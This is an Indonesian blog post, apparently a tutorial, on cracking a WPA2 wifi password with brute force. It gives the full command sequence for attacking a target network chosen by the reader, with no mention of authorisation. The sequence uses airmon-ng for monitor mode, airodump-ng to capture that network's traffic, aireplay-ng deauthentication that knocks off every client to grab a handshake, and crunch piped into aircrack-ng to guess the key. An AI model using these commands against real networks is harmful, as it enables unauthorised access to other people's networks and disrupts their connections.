Cara Hack Wifi dengan Crunch Dan Aircrack-ng



asalamualaikum,

kalian sudah sering melihat metode Dictionary attack, tapi kalian pasti masih jarang melihat metode Bruteforce pada WPA2
pertama tama saya akan jelaskan perbedaan Bruteforce dan Dictionary attack
Bruteforce adalah penyerangan menggunakan semua kemungkinan sandi kayak
a b c .....  9 0 $ % ( .... aa ab .... etc

nah sedangkan Dictionary attack adalah penyerangan menggunakan wordlist

oke saya akan memberi tahu penyerangan Brute Force
pertama kita aktifkan monitor mode "airmon-ng start wlan0"
kemudian kita akan liat semua wireless network dengan perintah "airodump-ng mon0"

oke kalian silahkan menccari network target kalian target saya ber ESSID kepoera dan ber mac address AA:AA:AA:AA:AA:AB dan ber channel (CH) 6
oke kalian bisa menghentikan airodump-ng nya dengan cara memasukan Ctrl+c

sekarang kita akan memasukan yang lebih spesifikasi
"airodump-ng -c <channel> --bssid <mac target> -w <save as> mon0"

maka yang saya masukan adalah
airodump-ng -c 6 --bssid AA:AA:AA:AA:AA:AB -w kepoera mon0"

oke kita harus mendapatkan handshake dengan perintah (di terminal baru)
"aireplay-ng -0 0 -a <BSSID> -c <Target mac address (masukan ff:ff:ff:ff:ff:ff bila mau mendc semua)> mon0"

maka yang saya masukan adalah
"aireplay-ng -0 0 -a AA:AA:AA:AA:AA:AB -c ff:ff:ff:ff:ff:ff mon0"
bila anda udah melihat tulisan HANDSHAKE di airodump-ng close aireplay-ng

oke setelah itu kita akan memasukan perintah untuk melakukan penyerangan

"crunch 8 8 0123456789 | aircrack-ng -a 2 <captured handshake> -e <ESSID> -b <BSSID> -w -"
maka saya akan memasukan ini
"crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/kepoera-01.cap -e kepoera -b aa:aa:aa:aa:aa:ab -w -"

sekian terima kasih

Post a Comment

0 Comments